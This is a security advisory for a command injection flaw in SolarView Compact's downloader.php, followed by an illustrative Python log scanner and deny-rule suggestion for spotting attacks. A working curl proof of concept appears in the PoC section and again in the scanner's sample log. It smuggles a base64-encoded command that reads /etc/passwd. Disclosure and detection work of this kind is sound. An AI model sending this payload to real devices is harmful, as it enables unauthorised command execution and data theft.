Summary:
SolarView Compact through 6.00 contains a command injection vulnerability: attackers can execute commands by bypassing internal restrictions through downloader.php.
Vendor:
- SolarView Compact
Affected Product:
- SolarView Compact
Version:
- SolarView Compact <= ver 6.00
PoC:
curl 'http://example.com/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg==|base64%20-d|bash%00.zip' | grep 'root:.*:0:0'
Details:
Commands can be injected through the file parameter of the downloader.php page, bypassing its internal restrictions.
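Detection:
A log check for the request pattern described above, as an added example that is not part of the original advisory or the vendor's code. It flags requests to downloader.php whose decoded file parameter contains shell metacharacters, whitespace or a NUL byte. The common log format, the sample lines, the file name report_2023.zip and the function names are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Request line inside a common/combined log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Characters that have no place in a download file name: shell
# metacharacters, whitespace and NUL (the PoC uses ';', '|', space, %00).
SUSPICIOUS_RE = re.compile(r"[;|&`$<>(){}\s\x00]")

def suspicious_file_param(target):
    """Return the decoded 'file' value if the target is downloader.php
    with a suspicious 'file' parameter, otherwise None."""
    path, _, query = target.partition("?")
    if path.rsplit("/", 1)[-1].lower() != "downloader.php":
        return None
    # Split on raw '&' only (as the server would), then decode each value,
    # so an encoded separator such as %26 stays inside the value it hides in.
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if unquote_plus(key) == "file":
            decoded = unquote_plus(value)
            if SUSPICIOUS_RE.search(decoded):
                return decoded
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every suspicious request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match:
            value = suspicious_file_param(match.group(1))
            if value is not None:
                hits.append((number, value))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2023:10:00:00 +0000] "GET /downloader.php?file=report_2023.zip HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2023:10:00:05 +0000] "GET /downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg==|base64%20-d|bash%00.zip HTTP/1.1" 200 812',
    '203.0.113.7 - - [01/Jan/2023:10:00:09 +0000] "GET /other.php?file=a;b HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious file parameter {value!r}")
```

The same character class can be used as a web application firewall or reverse-proxy deny rule in front of the device until it is updated.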
